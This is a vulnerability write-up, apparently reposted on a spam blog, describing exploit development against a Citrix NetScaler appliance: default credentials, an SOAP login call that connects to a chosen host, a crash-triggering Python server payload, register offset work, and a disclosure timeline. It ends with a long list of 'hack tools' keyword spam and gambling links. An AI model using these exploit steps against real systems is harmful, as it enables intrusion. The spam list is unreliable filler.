2020年8月27日 星期四

Scaling The NetScaler


A few months ago I noticed that Citrix provides virtual appliances to test their applications, I decided to pull down an appliance and take a peek. First I started out by downloading the trial Netscaler VM (version 10.1-119.7) from the following location:

http://www.citrix.com/products/netscaler-application-delivery-controller/try.html

Upon boot, the appliance is configured with nsroot/nsroot for the login and password. I logged in and started looking around and noticed that the web application is written in PHP using the code igniter framework (screw that crap). Since code igniter abstracts everything with MVC and actual scripts are hidden behind routes I decided to take a look at the apache configuration. I noticed that apache was configured with a SOAP endpoint that was using shared objects (YUMMY):

/etc/httpd 
# SOAP handler
<Location /soap>
SetHandler gsoap-handler SOAPLibrary /usr/lib/libnscli90.so SupportLibrary /usr/lib/libnsapps.so </Location>
It wasn't clear what this end point was used for and it wasn't friendly if you hit it directly:
So I grep'd through the application code looking for any calls to this service and got a hit:
root@ns# grep -r '/soap' *
models/common/xmlapi_model.php: $this->soap_client = new nusoap_client("http://" . $this->server_ip . "/soap");

Within this file I saw this juicy bit of PHP which would have made this whole process way easier if it wasn't neutered with the hardcoded "$use_api = true;"

/netscaler/ns_gui/admin_ui/php/application/models/common/xmlapi_model.php
protected function command_execution($command, $parameters, $use_api = true) {
//Reporting can use API & exe to execute commands. To make it work, comment the following line.
$use_api = true; if(!$use_api)
{
$exec_command = "/netscaler/nscollect " . $this- >convert_parameters_to_string($command, $parameters);
$this->benchmark->mark("ns_exe_start");
$exe_result = exec($exec_command); $this->benchmark->mark("ns_exe_end");
$elapsed_time = $this->benchmark->elapsed_time("ns_exe_start",
"ns_exe_end");
log_message("profile", $elapsed_time . " --> EXE_EXECUTION_TIME " .
$command); $this->result["rc"] = 0;
$this->result["message"] = "Done"; $this->result["List"] = array(array("response" => $exe_result));
$return_value = 0;
For giggles I set it to false and gave it a whirl, worked as expected :(

The other side of this "if" statement was a reference to making a soap call and due to the reference to the local "/soap" and the fact all roads from "do_login" were driven to this file through over nine thousand levels of abstraction it was clear that upon login the server made an internal request to this endpoint. I started up tcpdump on the loopback interface on the box and captured an example request:
root@ns# tcpdump -Ani lo0 -s0 port 80
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on lo0, link-type NULL (BSD loopback), capture size 65535 bytes 23:29:18.169188 IP 127.0.0.1.49731 > 127.0.0.1.80: P 1:863(862) ack 1 win 33304 <nop,nop,timestamp 1659543 1659542>
E...>D@.@............C.P'R...2.............
..R...R.POST /soap HTTP/1.0
Host: 127.0.0.1
User-Agent: NuSOAP/0.9.5 (1.56)
Content-Type: text/xml; charset=ISO-8859-1
SOAPAction: ""
Content-Length: 708
<?xml version="1.0" encoding="ISO-8859-1"?><SOAP-ENV:Envelope SOAP- ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP- ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP- ENC="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body> <ns7744:login xmlns:ns7744="urn:NSConfig"><username xsi:type="xsd:string">nsroot</username><password xsi:type="xsd:string">nsroot</password><clientip
xsi:type="xsd:string">192.168.166.1</clientip><cookieTimeout xsi:type="xsd:int">1800</cookieTimeout><ns xsi:type="xsd:string">192.168.166.138</ns></ns7744:login></SOAP-ENV:Body> </SOAP-ENV:Envelope>
23:29:18.174582 IP 127.0.0.1.80 > 127.0.0.1.49731: P 1:961(960) ack 863 win 33304 <nop,nop,timestamp 1659548 1659543>
E...>[@.@............P.C.2..'R.o.....\.....
..R...R.HTTP/1.1 200 OK
Date: Mon, 02 Jun 2014 23:29:18 GMT
Server: Apache
Last-Modified: Mon, 02 Jun 2014 23:29:18 GMT Status: 200 OK
Content-Length: 615
Connection: keep-alive, close
Set-Cookie: NSAPI=##7BD2646BC9BC8A2426ACD0A5D92AF3377A152EBFDA878F45DAAF34A43 09F;Domain=127.0.0.1;Path=/soap;Version=1
Content-Type: text/xml; charset=utf-8
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP- ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP- ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns="urn:NSConfig"> <SOAP-ENV:Header></SOAP-ENV:Header><SOAP-ENV:Body SOAP- ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <ns:loginResponse><return xsi:type="ns:simpleResult"><rc xsi:type="xsd:unsignedInt">0</rc><message xsi:type="xsd:string">Done</message> </return></ns:loginResponse></SOAP-ENV:Body></SOAP-ENV:Envelope>
I pulled the request out and started playing with it in burp repeater. The one thing that seemed strange was that it had a parameter that was the IP of the box itself, the client string I got...it was used for tracking who was making requests to login, but the other didn't really make sense to me. I went ahead and changed the address to another VM and noticed something strange:


According to tcpdump it was trying to connect to my provided host on port 3010:
root@ns# tcpdump -A host 192.168.166.137 and port not ssh
tcpdump: WARNING: BIOCPROMISC: Device busy
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on 0/1, link-type EN10MB (Ethernet), capture size 96 bytes 23:37:17.040559 IP 192.168.166.138.49392 > 192.168.166.137.3010: S 4126875155:4126875155(0) win 65535 <mss 1460,nop,wscale 1,nop,nop,timestamp 2138392 0,sackOK,eol>

I fired up netcat to see what it was sending, but it was just "junk", so I grabbed a pcap on the loopback interface on the netscaler vm to catch a normal transaction between the SOAP endpoint and the service to see what it was doing. It still wasn't really clear exactly what the data was as it was some sort of "binary" stream:
I grabbed a copy of the servers response and setup a test python client that replied with a replay of the servers response, it worked (and there may be an auth bypass here as it responds with a cookie for some API functionality...). I figured it may be worth shooting a bunch of crap back at the client just to see what would happen. I modified my python script to insert a bunch "A" into the stream:
import socket,sys
resp = "\x00\x01\x00\x00\xa5\xa5"+ ("A"*1000)+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
HOST = None # Symbolic name meaning all available interfaces
PORT = 3010 # Arbitrary non-privileged port
s = None
for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC,socket.SOCK_STREAM, 0, socket.AI_PASSIVE):
af, socktype, proto, canonname, sa = res
try:
s = socket.socket(af, socktype, proto)
except socket.error as msg:
s = None
continue
try:
s.bind(sa)
s.listen(1)
except socket.error as msg:
s.close()
s = None
continue
break
if s is None:
print 'could not open socket'
sys.exit(1)
conn, addr = s.accept()
print 'Connected by', addr
while 1:
data = conn.recv(1024)
if not data:
break
print 'sending!' conn.send(resp)
print 'sent!' conn.close()


Which provided the following awesome log entry in the Netscaler VM window:
Loading the dump up in gdb we get the following (promising looking):


And the current instruction it is trying to call:
An offset into the address 0x41414141, sure that usually works :P - we need to adjust the payload in a way that EDX is a valid address we can address by offset in order to continue execution. In order to do that we need to figure out where in our payload the EDX value is coming from. The metasploit "pattern_create" works great for this ("root@blah:/usr/share/metasploit-framework/tools# ./pattern_create.rb 1000"). After replacing the "A" *1000 in our script with the pattern we can see that EDX is at offset 610 in our payload:





Looking at the source of EDX, which is an offset of EBP we can see the rest of our payload, we can go ahead and replace the value in our payload at offset 610 with the address of EBP 
resp = "\x00\x01\x00\x00\xa5\xa5"+p[:610]+'\x78\xda\xff\xff'+p[614:]+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

When we run everything again and take a look at our core dump you can see we have progressed in execution and have hit another snag that causes a crash:


The crash was caused because once again the app is trying to access a value at an offset of a bad address (from our payload). This value is at offset 606 in our payload according to "pattern_offset" and if you were following along you can see that this value sits at 0xffffda78 + 4, which is what we specified previously. So we need to adjust our payload with another address to have EDX point at a valid address and keep playing whack a mole OR we can look at the function and possibly find a short cut:




If we can follow this code path keeping EDX a valid memory address and set EBP+12 (offset in our payload) to 0x0 we can take the jump LEAV/RET and for the sake of time and my sanity, unroll the call stack to the point of our control. You will have to trust me here OR download the VM and see for yourself (my suggestion if you have found this interesting :> )

And of course, the money shot:


A PoC can be found HERE that will spawn a shell on port 1337 of the NetScaler vm, hopefully someone has some fun with it :)

It is not clear if this issue has been fixed by Citrix as they stopped giving me updates on the status of this bug. For those that are concerned with the timeline:

6/3/14 - Bug was reported to Citrix
6/4/14 - Confirmation report was received
6/24/14 - Update from Citrix - In the process of scheduling updates
7/14/14 - Emailed asking for update
7/16/14 - Update from Citrix - Still scheduling update, will let me know the following week.
9/22/14 - No further communication received. Well past 100 days, public disclosure


Continue reading


  1. Hack Tools Pc
  2. Pentest Tools For Windows
  3. New Hacker Tools
  4. Hack Tools
  5. Hacker Tools List
  6. Hacker Tools 2020
  7. Hack Tools For Games
  8. Hacker Hardware Tools
  9. Hacking Tools For Windows 7
  10. Hack Tools 2019
  11. Hack Tools For Windows
  12. Game Hacking
  13. Hacker Tools Apk Download
  14. Hack Tools Online
  15. Hack Website Online Tool
  16. Hack Tools
  17. Easy Hack Tools
  18. Nsa Hacker Tools
  19. Underground Hacker Sites
  20. Bluetooth Hacking Tools Kali
  21. Tools For Hacker
  22. Top Pentest Tools
  23. Game Hacking
  24. Pentest Tools Port Scanner
  25. Hack Rom Tools
  26. Nsa Hacker Tools
  27. Hack Website Online Tool
  28. Pentest Tools Website
  29. Blackhat Hacker Tools
  30. Hack Apps
  31. How To Install Pentest Tools In Ubuntu
  32. Hack Tools Online
  33. Computer Hacker
  34. Pentest Tools Review
  35. Hacker Security Tools
  36. Hacker Tools For Pc
  37. Hack Tools For Pc
  38. Hack Tools Download
  39. Pentest Tools Linux
  40. Black Hat Hacker Tools
  41. Hacking Tools For Pc
  42. Nsa Hacker Tools
  43. New Hack Tools
  44. Hacker Tools Windows
  45. Hack Tools For Windows
  46. Best Hacking Tools 2019
  47. World No 1 Hacker Software
  48. Hack Tools Mac
  49. Pentest Tools List
  50. Hacker Tools For Pc
  51. Beginner Hacker Tools
  52. Hacking Tools Github
  53. Wifi Hacker Tools For Windows
  54. Ethical Hacker Tools
  55. Hacker Tools Mac
  56. Hacker Tools Apk
  57. Hacker Tools Apk Download
  58. Pentest Tools Website
  59. Hack Tools For Ubuntu
  60. Pentest Tools Url Fuzzer
  61. Pentest Tools Website Vulnerability
  62. Pentest Tools Bluekeep
  63. Hack Tools
  64. Hacker Tools Apk
  65. Hacker Hardware Tools
  66. Hacking Tools Kit
  67. Hack Rom Tools
  68. Hacking Apps
  69. Github Hacking Tools
  70. Top Pentest Tools
  71. Pentest Tools For Mac
  72. Hacking Tools Kit
  73. World No 1 Hacker Software
  74. Pentest Tools Bluekeep
  75. Pentest Tools Bluekeep
  76. Hackrf Tools
  77. Beginner Hacker Tools
  78. Hacker Tools Github
  79. Hacker Tools Github
  80. Pentest Tools Subdomain
  81. Hacking Tools For Windows
  82. Hacker Tools For Pc
  83. Hacker Tools For Pc
  84. Github Hacking Tools
  85. Hacker Tools Linux
  86. Pentest Tools List
  87. Hacking Tools Software
  88. Pentest Tools Website Vulnerability
  89. Nsa Hack Tools Download
  90. Nsa Hack Tools
  91. Pentest Tools Framework
  92. Hacking Tools For Games
  93. Hack And Tools
  94. Hacks And Tools
  95. Pentest Tools
  96. Pentest Tools For Windows
  97. Hacking Tools Mac
  98. Ethical Hacker Tools
  99. Hack Rom Tools
  100. Wifi Hacker Tools For Windows
  101. Hacking Tools Windows 10
  102. Hacker Techniques Tools And Incident Handling
  103. Pentest Tools Review
  104. Pentest Box Tools Download
  105. Hacker Tools For Ios
  106. Hacker Tools Software
  107. Hacking Tools For Pc
  108. Hack Tools For Pc
  109. Nsa Hack Tools Download
  110. Hacking Tools Windows 10
  111. Pentest Tools Alternative
  112. Hacking Tools Windows 10
  113. Hacker Tools Hardware
  114. Hacker Tools Hardware
  115. Hacker Techniques Tools And Incident Handling
  116. Hack Tools Github
  117. Game Hacking
  118. Ethical Hacker Tools
  119. Pentest Box Tools Download
  120. Hacking Apps
  121. Hacking Tools And Software
  122. Pentest Tools Website Vulnerability
  123. Pentest Tools For Mac
  124. Hacker Tools For Windows
  125. What Are Hacking Tools
  126. Hack Tools Pc
  127. Pentest Tools Android
  128. World No 1 Hacker Software
  129. Black Hat Hacker Tools
  130. Hacker
  131. Hacker Tools Free
  132. Pentest Tools For Windows
  133. Pentest Tools List
  134. Hak5 Tools
  135. Best Hacking Tools 2019
  136. Pentest Automation Tools
  137. Termux Hacking Tools 2019
  138. Github Hacking Tools
  139. Ethical Hacker Tools
  140. Tools Used For Hacking
  141. Hack Tools Download
  142. Hak5 Tools
  143. Hack Tools 2019
  144. Growth Hacker Tools
  145. Pentest Tools Subdomain
  146. Hacking Tools Pc
  147. Tools Used For Hacking
  148. Pentest Tools Find Subdomains
  149. Pentest Tools Kali Linux
  150. Hacker Tools 2019
  151. Hacking Tools For Beginners
  152. Hacker Security Tools
  153. Pentest Tools Android
  154. Hacking App
  155. Hacking Tools And Software
  156. Hacking Tools Pc
  157. Hack Tools 2019
  158. Hack Tools Online
  159. Pentest Recon Tools
  160. Hacker Techniques Tools And Incident Handling
  161. Hacking Tools Usb
  162. Pentest Tools For Android
  163. Hacking Apps
  164. Hack And Tools
  165. Hacking Tools 2020
  166. Pentest Tools Windows
  167. Pentest Tools Review
  168. Hacking Tools Name
  169. Hacker Tools Free Download
  170. Hacking App
  171. Hacking Tools For Games
  172. Beginner Hacker Tools
  173. Pentest Tools Tcp Port Scanner
  174. Wifi Hacker Tools For Windows
  175. Easy Hack Tools
  176. Hacker Tools 2020

歡迎蒞臨:https://ofa588.com/

娛樂推薦:https://www.ofa86.com/

張貼者:

沒有留言:

張貼留言

訂閱: 張貼留言 (Atom)